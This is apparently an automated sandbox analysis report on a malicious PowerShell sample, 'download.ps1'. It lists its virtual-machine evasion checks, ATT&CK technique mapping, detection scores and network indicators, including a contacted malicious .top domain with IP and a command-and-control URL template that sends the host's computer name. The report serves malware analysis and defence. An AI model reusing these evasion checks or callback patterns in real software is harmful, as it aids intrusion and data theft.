Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9955Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8612Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: powershell.exe, 00000000.00000002.978672288.0000019C2B7A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1009184849.0000019C42E99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.1009184849.0000019C42E99000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2B7A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1009760762.0000019C43167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.978107895.0000019C2A6E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: svchost.exe, 00000006.00000002.2188259433.000002805AE8C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2186527516.0000028059030000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.1009184849.0000019C42E99000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1009760762.0000019C43167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.1009760762.0000019C4316A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW21%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.978672288.0000019C2B7A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping211
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		12
Virtualization/Sandbox Evasion		LSASS Memory12
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps15%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://wsoft.com/pki/ceroCerAut_2010-06-0%Avira URL Cloudsafe
http://crl.t.com/pki/crl/pr0%Avira URL Cloudsafe
http://www.microsoft.co0%Avira URL Cloudsafe
http://crl.microso0%Avira URL Cloudsafe
http://www.google.comj0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.pngXzf0%Avira URL Cloudsafe
https://apis.google.comXzf0%Avira URL Cloudsafe
http://crl.p0%Avira URL Cloudsafe
http://crl.micr90%Avira URL Cloudsafe
http://$kslt27cb1amnzqo/$wtdlhyxu19ai8vf.php?id=$env:computername&key=$rpsakvbwizxdmj&s=5270%Avira URL Cloudsafe
http://canjjclmlnicbga.top0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
canjjclmlnicbga.top
45.61.136.138
truetrue
    		unknown
    www.google.com
    		172.217.1.100
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://github.com/Pester/PesterXzfpowershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1002083018.0000019C3ADF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3AE64000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.microsoft.copowershell.exe, 00000000.00000002.1009760762.0000019C4317E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schema.org/WebPagepowershell.exe, 00000000.00000002.1002083018.0000019C3AED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C61A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C627000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C316000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C63E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C4F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C31A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C2FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADB3000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.microsopowershell.exe, 00000000.00000002.1009760762.0000019C4316A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngXzfpowershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.micr9powershell.exe, 00000000.00000002.1009617159.0000019C42EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/powershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.google.comjpowershell.exe, 00000000.00000002.978672288.0000019C2BA43000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.google.compowershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA43000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://apis.google.compowershell.exe, 00000000.00000002.1002083018.0000019C3AED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3AE64000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schema.org/WebPageXzfpowershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.978107895.0000019C2A682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188514912.000002805AF02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188353414.000002805AE99000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.978672288.0000019C2ABD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.t.com/pki/crl/prpowershell.exe, 00000000.00000002.1007540490.0000019C42DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://wsoft.com/pki/ceroCerAut_2010-06-powershell.exe, 00000000.00000002.1007540490.0000019C42DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
